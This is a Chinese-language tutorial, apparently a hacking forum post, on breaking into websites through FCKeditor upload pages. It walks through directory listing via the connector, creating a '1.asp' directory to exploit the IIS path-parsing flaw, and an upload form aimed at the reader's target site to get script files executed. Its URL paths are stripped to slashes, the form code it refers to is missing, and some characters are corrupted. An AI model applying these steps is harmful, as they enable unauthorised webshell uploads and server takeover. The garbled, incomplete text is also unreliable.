首先,你得確定下的版本�����。
////.html
其次,你確定下以下幾個上傳頁面是否真的被刪除了呢?
//////.html
///////test.html
/////test.html
/////test.html
/////.html
嗯,好吧,都已經刪除了,真是太倒霉了,怎么辦,確認下這些文件有哪個存在的么
/////aspx/.aspx
/////asp/.asp
/////php/.php
如果存在,那太好了,你可以繼續看下去了,我這里以aspx的為例
1.查看Media目錄下的文件:
/////aspx/.aspx?=&Type=Media&=%2F
紅色Media可以更改為File或者,相應的進入文件或者圖片目錄下
2.利用iis解析漏洞創建1.asp特殊目錄
////aspx/.aspx?=&Type=Media&=%2F&=1.asp
紅色的是對應的Media目錄,藍色的是特殊目錄名字
3.構建表單,上傳到特殊目錄
將以上代表保存為HTML格式fckedit可以上傳大文件,修改成你入侵的網站地址,Type=Media是對應的Media目錄,1.asp為特殊目錄名。
最后的一些提示
上 傳之后的路徑需要你在上傳表單里面的代碼里找,當然fckedit可以上傳大文件,他的呈現方式是一個上傳好了的文件名,全路徑必須你自己組合,我相信你是會的��。如果訪問之后發現無法 訪問,試著上傳一張正確的圖片,再進行訪問,如果訪問成功,說明管理員已經補上了IIS路徑解析漏洞,那你得另找出路了�。
